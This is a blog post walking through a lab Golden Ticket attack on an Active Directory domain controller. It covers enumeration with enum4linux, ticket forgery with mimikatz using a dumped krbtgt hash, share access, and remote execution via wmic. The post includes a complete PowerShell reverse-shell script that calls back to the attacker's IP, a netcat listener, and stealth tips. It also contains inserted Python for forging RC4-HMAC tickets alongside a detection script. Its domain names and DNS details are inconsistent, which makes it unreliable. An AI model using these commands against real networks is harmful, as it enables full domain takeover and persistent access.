This is the second part of my previous post. Remember: you have the dump of the domain controller's hashes, but it's a test lab, and when you try to log in via PtH (pass-the-hash)... no way. Probably the domain admin password was changed...

Game over?

Not at all... we can try the "Golden Ticket" solution...

What is the Golden Ticket?

Before going ahead, a short recap of the Microsoft Kerberos architecture:

[Image: kerberos1]

To access resources on a Windows AD network using the Kerberos protocol, you first have to obtain a TGT (Ticket Granting Ticket) from the KDC; you then present that TGT to request a service ticket (TGS) for each service you want to reach. Both kinds of ticket are issued by the KDC service, which runs on the domain controllers, and the TGT itself is encrypted with the key of the krbtgt account.

Got it? And here comes the "Golden Ticket" attack: since the KDC trusts any TGT it can decrypt and validate with the krbtgt key, whoever holds that key can forge Ticket Granting Tickets (TGT) offline, impersonate any domain user (including the group memberships written into the ticket's PAC) and make the ticket valid for 10 years, or as long as they choose!

What do we need to create this Golden Ticket?

  1. the domain name (FQDN)
  2. the AD domain security identifier (SID)
  3. a valid username (Administrator, of course!)
  4. the NT hash of the KRBTGT account

Domain name and domain SID are not an issue; for example you could use the "enum4linux" tool on a Linux box (all you need is the IP address of the DC):

#enum4linux 10.1.3.40
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Feb 14 22:10:13 2017

==========================
| Target Information |
==========================
Target ........... 10.1.3.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=======================================================
| Enumerating Workgroup/Domain on 10.1.3.40 |
=======================================================
[+] Got domain/workgroup name: DUMMYCOMPANY

===============================================
| Nbtstat Information for 10.1.3.40 |
===============================================
Looking up status of 10.1.3.40
SERVER2012DC - B Workstation Service
DUMMYCOMPANY - B Domain/Workgroup Name
DUMMYCOMPANY - B Domain Controllers
SERVER2012DC - B File Server Service
DUMMYCOMPANY - B Domain Master Browser

MAC Address = 08-00-27-DC-6C-54
...
...

==============================================
| Getting domain SID for 10.1.3.40 |
==============================================
Domain Name: DUMMYCOMPANY
Domain Sid: S-1-5-21-3534665177-2148510708-2241433719
[+] Host is part of a domain (not a workgroup)
=========================================
| OS information on 10.1.3.40 |
=========================================
[+] Got OS info for 10.1.3.40 from smbclient: Domain=[DUMMYCOMPANY] OS=[Windows Server 2012 R2 Datacenter 9600] Server=[Windows Server 2012 R2 Datacenter 6.3]

You will get many "Access Denied" messages because you are connecting as an anonymous user, but all the necessary information will be delivered to you 😉 (On a hardened DC where anonymous SMB/RPC access is blocked you would have to run it with any valid domain account instead.)

To get the FQDN of the domain, just do a reverse lookup against the DNS server hosted on the DC:

# nslookup
> server 10.1.3.40
Default server: 10.1.3.40
Address: 10.1.3.40#53
> set q=ptr
> 10.1.3.40
Server: 10.1.3.40
Address: 10.1.3.40#53

40.3.2.10.in-addr.arpa name = server2012dc.dummycompany.local

Got it? Great! And now the last one, the KRBTGT hash. But first of all, what is this account?

“The KRBTGT account is a local default account that acts as a service account for the Key Distribution Center (KDC) service. This account cannot be deleted, and the account name cannot be changed. The KRBTGT account cannot be enabled in Active Directory.”

And yes, we have the hash of the KRBTGT account's password in our dump, remember?

The only problem we could face is that the password of "krbtgt" was changed in the meantime, but due to the severe impact of this operation on the entire domain, probably this will not be the case. Admins will change this password only if a security issue occurs (such as evidence of a "Golden Ticket" 😉). Keep in mind, from the defender's side, that the KDC still accepts tickets encrypted with the previous krbtgt key, so the account has to be reset twice (allowing replication between the two resets) before a dumped hash really stops working.

In brief, we have the following info:

  1. Domain name: DUMMYCOMPANY (FQDN dummycompany.local)
  2. User name: Administrator
  3. SID: S-1-5-21-3534665177-2148510708-2241433719
  4. KRBTGT NT hash: 3003567af268a4a94e26f410e84353f1
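Before moving on to mimikatz, here is an added example (my own illustration, not code from the original post or from mimikatz) of what the KRBTGT hash actually buys you. Under the RC4-HMAC encryption type that mimikatz reports as rc4_hmac_nt, the NT hash is used directly as the Kerberos key, so the dumped hash is enough to encrypt and checksum a ticket body exactly as the KDC would, and a KDC holding the same hash will accept it. The block implements RFC 4757 RC4-HMAC encryption and decryption in Python over a constructed stand-in for the EncTicketPart (no ASN.1 or PAC is built here); the krbtgt hash and realm are the ones from this post, and the rotated-key case at the end shows why the caveat about a changed krbtgt password matters: with a different key the integrity check fails and the forged ticket is rejected.

```python
"""RFC 4757 RC4-HMAC (etype 23) as used for a golden ticket's EncTicketPart.

Added example, not code from the original post or from mimikatz. Under
RC4-HMAC the NT hash *is* the Kerberos key, so whoever holds the krbtgt
hash can encrypt and MAC ticket data exactly as the KDC would. The
plaintext used below is a constructed stand-in for the ASN.1
EncTicketPart/PAC, which this example does not build.
"""
import hashlib
import hmac
import os
import struct
from typing import Optional

# Kerberos key-usage number for the Ticket enc-part (RFC 4120, 7.5.1).
KEY_USAGE_TICKET = 2

# krbtgt NT hash from the post: with RC4-HMAC this raw hash is the key.
KRBTGT_NT_HASH = "3003567af268a4a94e26f410e84353f1"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same op."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _usage_bytes(usage: int) -> bytes:
    # RFC 4757 remaps a few RFC 3961 usage numbers before encoding them
    # as a 4-byte little-endian integer.
    usage = {3: 8, 9: 8, 23: 13}.get(usage, usage)
    return struct.pack("<I", usage)


def rc4_hmac_encrypt(nt_hash_hex: str, usage: int, plaintext: bytes,
                     confounder: Optional[bytes] = None) -> bytes:
    """Encrypt the way mimikatz does for 'ServiceKey ... - rc4_hmac_nt'.

    Output layout: checksum(16) || RC4(K3, confounder(8) || plaintext).
    """
    key = bytes.fromhex(nt_hash_hex)
    confounder = confounder if confounder is not None else os.urandom(8)
    k1 = hmac.new(key, _usage_bytes(usage), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(nt_hash_hex: str, usage: int, ciphertext: bytes) -> bytes:
    """What the KDC does with an incoming TGT: decrypt, then verify the MAC.

    Raises ValueError when the key does not match (e.g. krbtgt was reset).
    """
    if len(ciphertext) < 24:
        raise ValueError("ciphertext too short")
    key = bytes.fromhex(nt_hash_hex)
    checksum, edata = ciphertext[:16], ciphertext[16:]
    k1 = hmac.new(key, _usage_bytes(usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, edata)
    expected = hmac.new(k1, data, hashlib.md5).digest()
    if not hmac.compare_digest(checksum, expected):
        raise ValueError("ticket integrity check failed: wrong krbtgt key")
    return data[8:]  # strip the confounder


def forge_and_present(kdc_hash_hex: str) -> bool:
    """Forge a ticket body under the dumped hash, then let a 'KDC' holding
    kdc_hash_hex try to accept it. True means the golden ticket would work."""
    # Constructed stand-in for the EncTicketPart (real ones carry ASN.1 + PAC).
    fake_enc_ticket_part = b"cname=Administrator;realm=DUMMYCOMPANY.LOCAL;groups=512,519"
    forged = rc4_hmac_encrypt(KRBTGT_NT_HASH, KEY_USAGE_TICKET, fake_enc_ticket_part)
    try:
        return rc4_hmac_decrypt(kdc_hash_hex, KEY_USAGE_TICKET, forged) == fake_enc_ticket_part
    except ValueError:
        return False


if __name__ == "__main__":
    print("krbtgt unchanged :", forge_and_present(KRBTGT_NT_HASH))  # True
    print("krbtgt rotated   :", forge_and_present("0" * 32))        # False
```

Note that nothing in the decryption path identifies who produced the ciphertext: the KDC can only check that the checksum verifies under the krbtgt key, which is exactly why the attack works and why rotating that key (twice) is the only real fix.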

Creating “Golden Tickets”

Time has come to put into practice all we discussed above. First of all, fire up your Windows box with "mimikatz" installed!

On your Windows (virtual or physical) machine, log on with local admin rights, open an elevated command prompt and launch "mimikatz.exe":

mimikatz # kerberos::golden /admin:Administrator /domain:DUMMYDOMAIN.LOCAL /sid:S-1-5-21-3534665177-2148510708-2241433719 /krbtgt:3003567af268a4a94e26f410e84353f1 /ticket:admin.krb /ptt

User : Administrator
Domain : DUMMYDOMAIN.LOCAL (DUMMYDOMAIN)
SID : S-1-5-21-3534665177-2148510708-2241433719
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 3003567af268a4a94e26f410e84353f1 - rc4_hmac_nt
Lifetime : 2/14/2017 11:08:35 PM ; 2/12/2027 11:08:35 PM ; 2/12/2027 11:08:35 PM
-> Ticket : admin.krb

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

So we told mimikatz to generate a "golden ticket" for the user Administrator on DUMMYDOMAIN.LOCAL with all the necessary parameters and to save it to a file for later use. Note the "Groups Id" line: mimikatz writes the well-known RIDs 513 (Domain Users), 512 (Domain Admins), 520 (Group Policy Creator Owners), 518 (Schema Admins) and 519 (Enterprise Admins) into the ticket's PAC, and that is where the privileges actually come from. The last option, /ptt, tells mimikatz to load the newly created ticket directly into memory, ready for "Pass The Ticket" operations.

Now we can exit mimikatz and list the tickets from our command shell:

C:\Users\Administrator\>klist

Current LogonId is 0:0x219fd

Cached Tickets: (1)

#0> Client: Administrator @ DUMMYDOMAIN.LOCAL
Server: krbtgt/DUMMYDOMAIN.LOCAL @ DUMMYDOMAIN.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 2/15/2017 7:14:56 (local)
End Time: 2/13/2027 7:14:56 (local)
Renew Time: 2/13/2027 7:14:56 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

Great! Finally we have our "Golden Ticket", and look at the lifetime: 10 years!! (The default domain policy caps a user TGT at 10 hours, which is exactly why a lifetime like this is a detection indicator.)
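An added example for the defensive side, written by me and not part of the original post: a small Python parser that sweeps klist output for krbtgt tickets whose lifetime exceeds what the domain policy allows. The sample listing embedded in it is constructed to mirror the one above (the 10-year TGT next to a normal 10-hour one for a made-up user "jdoe"); the 10-hour threshold is the Windows default "Maximum lifetime for user ticket" and should be replaced with your domain's value. It also surfaces the empty "Kdc Called:" field, which in the listing above is consistent with a ticket that was injected rather than requested from a domain controller.

```python
"""Spot a golden ticket in `klist` output by its lifetime.

Added example, not part of the original post. The ticket mimikatz just
created is valid for 10 years, while the default domain policy caps a TGT
at 10 hours. A quick sweep is to collect `klist` output from hosts and
flag any krbtgt ticket whose End Time lies far beyond what the KDC would
ever issue. SAMPLE_KLIST is constructed to mirror the post's listing.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Default "Maximum lifetime for user ticket" in Default Domain Policy.
MAX_TGT_LIFETIME = timedelta(hours=10)

# Constructed sample: the golden ticket from the post plus a normal-looking one.
SAMPLE_KLIST = """\
Current LogonId is 0:0x219fd

Cached Tickets: (2)

#0>     Client: Administrator @ DUMMYDOMAIN.LOCAL
        Server: krbtgt/DUMMYDOMAIN.LOCAL @ DUMMYDOMAIN.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 2/15/2017 7:14:56 (local)
        End Time:   2/13/2027 7:14:56 (local)
        Renew Time: 2/13/2027 7:14:56 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: jdoe @ DUMMYDOMAIN.LOCAL
        Server: krbtgt/DUMMYDOMAIN.LOCAL @ DUMMYDOMAIN.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/15/2017 7:00:00 (local)
        End Time:   2/15/2017 17:00:00 (local)
        Renew Time: 2/22/2017 7:00:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: server2012dc.dummydomain.local
"""

FIELD = re.compile(
    r"^\s*(Client|Server|KerbTicket Encryption Type|Start Time|End Time|"
    r"Renew Time|Kdc Called):\s*(.*?)\s*$"
)
TIME_FMT = "%m/%d/%Y %H:%M:%S"


def parse_klist(text: str) -> List[Dict[str, str]]:
    """Split klist output into one dict of fields per '#n>' ticket entry."""
    tickets: List[Dict[str, str]] = []
    for line in text.splitlines():
        if re.match(r"^#\d+>", line):
            tickets.append({})
            line = re.sub(r"^#\d+>", "", line)  # the Client field shares this line
        if not tickets:
            continue
        m = FIELD.match(line)
        if m:
            tickets[-1][m.group(1)] = m.group(2)
    return tickets


def _parse_time(value: str) -> datetime:
    # klist prints e.g. "2/15/2017 7:14:56 (local)"; drop the suffix.
    return datetime.strptime(value.replace("(local)", "").strip(), TIME_FMT)


def find_suspicious_tgts(text: str,
                         max_lifetime: timedelta = MAX_TGT_LIFETIME) -> List[Dict[str, object]]:
    """Return every krbtgt ticket whose lifetime exceeds the domain maximum.

    Each finding carries the client, the lifetime, the encryption type and
    whether a KDC was ever contacted for it (an injected ticket has none).
    """
    findings: List[Dict[str, object]] = []
    for t in parse_klist(text):
        if not t.get("Server", "").lower().startswith("krbtgt/"):
            continue  # only TGTs are compared against the TGT lifetime policy
        lifetime = _parse_time(t["End Time"]) - _parse_time(t["Start Time"])
        if lifetime > max_lifetime:
            findings.append({
                "client": t["Client"],
                "lifetime": lifetime,
                "etype": t.get("KerbTicket Encryption Type", ""),
                "kdc_called": t.get("Kdc Called", "") != "",
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_tgts(SAMPLE_KLIST):
        print(f"SUSPICIOUS TGT for {f['client']}: {f['lifetime'].days} days, "
              f"etype {f['etype']}, KDC contacted: {f['kdc_called']}")
```

Run it against klist output collected from a host (for example via a scheduled `klist` in a logon script) and anything with a lifetime of thousands of days stands out immediately; an RC4 TGT in a domain that otherwise issues AES tickets is a second, weaker hint that the ticket was forged from an NT hash.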

Does it work? Fingers crossed again; let's try to list the contents of the C: drive of the domain controller. But first of all, map the server's name in the hosts file or point your DNS at the domain controller, it's up to you! If you try to access the share by IP address, there is no SPN for Kerberos to use, so Windows falls back to NTLM authentication and all you will get is "ACCESS DENIED".

C:\Users\Administrator>dir \\server2012dc.dummydomain.local\c$
Volume in drive \\server2012dc.dummydomain.local\c$ has no label.
Volume Serial Number is A2D7-CEAD

Directory of \\server2012dc.dummydomain.local\c$

08/22/2013 07:52 AM PerfLogs
08/22/2013 06:50 AM Program Files
01/13/2017 10:35 PM Program Files (x86)
01/27/2017 03:57 AM temp
01/27/2017 02:43 AM test
01/27/2017 01:37 AM Users
...

Awesome! We listed the contents of the C: drive of the domain controller "server2012dc": we have Domain Admin privileges!!

Now let's go further. Having access to the filesystem (local or shared) with admin privileges is a great result, but we want more... what about a shell to interact with the domain controller? That would be the big deal. Is it possible? Yes, of course!

But it's not that easy: how can we get a remote shell authenticating with a Kerberos ticket?

What do we need to accomplish this?

And here comes into play the fantastic built-in MS tool "wmic.exe".

This tool is a command-line front-end to WMI (Windows Management Instrumentation) and, guess what? It can spawn processes on remote computers authenticating via Kerberos!

First of all we need the right service tickets (remember the TGS?) for the WMI calls, basically two:

  1. RPCSS: the ticket for the remote procedure call service (DCOM, and therefore WMI, rides on RPC)
  2. HOST: the host ticket for the target computer (the HOST SPN class covers the services on a machine that have no SPN of their own)

Again, with mimikatz we can create them without problems:

mimikatz # kerberos::golden /admin:administrator /domain:dummydomain.local /krbtgt:3003567af268a4a94e26f410e84353f1 /sid:S-1-5-21-3534665177-2148510708-2241433719 /service:rpcss /ptt

mimikatz # kerberos::golden /admin:administrator /domain:dummydomain.local /krbtgt:3003567af268a4a94e26f410e84353f1 /sid:S-1-5-21-3534665177-2148510708-2241433719 /service:host /ptt

Let’s check if it’s Ok:

C:\Users\Administrator>klist

Current LogonId is 0:0x219fd

Cached Tickets: (2)

#0> Client: administrator @ mydomainb.local
Server: host/mydomainb.local @ mydomainb.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 2/15/2017 9:38:23 (local)
End Time: 2/13/2027 9:38:23 (local)
Renew Time: 2/13/2027 9:38:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

#1> Client: administrator @ mydomainb.local
Server: rpcss/mydomainb.local @ mydomainb.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 2/15/2017 9:38:13 (local)
End Time: 2/13/2027 9:38:13 (local)
Renew Time: 2/13/2027 9:38:13 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

Good! We generated the necessary tickets; now it's time to set up some kind of remote shell, for example meterpreter or whatever you want... but we are PS fans, so let's go for PowerShell 😉

We will copy this reverse-shell script to the domain controller (assuming your IP is 10.1.2.40):

c:\users\administrator>type rev.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.1.2.40',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

c:\users\administrator\>copy rev.ps1 \\server2012dc.dummycompany.local\c$\windows\temp

After that, we can call the PowerShell script through wmic (remember to launch "nc -lp 8080" on your Linux box first!). Note for the blue team: a process started this way runs on the target as a child of WmiPrvSE.exe, which is the classic indicator of remote WMI execution:

wmic /authority:"kerberos:DUMMYDOMAIN\SERVER2012DC" /node:server2012dc process call create "powershell -f c:\windows\temp\rev.ps1"

Fingers crossed again... and take a look at our terminal:

connect to [10.1.2.40] from server2012dc.dummydomain.local [10.1.3.40] 62471

PS C:\Windows\system32>
PS C:\Windows\system32>
PS C:\Windows\system32> whoami
dummycompany\administrator

We did it, great job!

That's all. 🙂


2 thoughts on "The "Golden Ticket" solution"

  1. Just forgot to clarify these points:
    1) If you don't create the service tickets (rpcss, host, cifs), Windows will ask for them for you. But we have to be as stealthy as possible 😉
    2) You can also use psexec to get a remote shell (works with Kerberos auth) but again, this will create the PSEXESVC service on the remote machine for the whole duration of the shell. But again, we want to be stealthy 😉
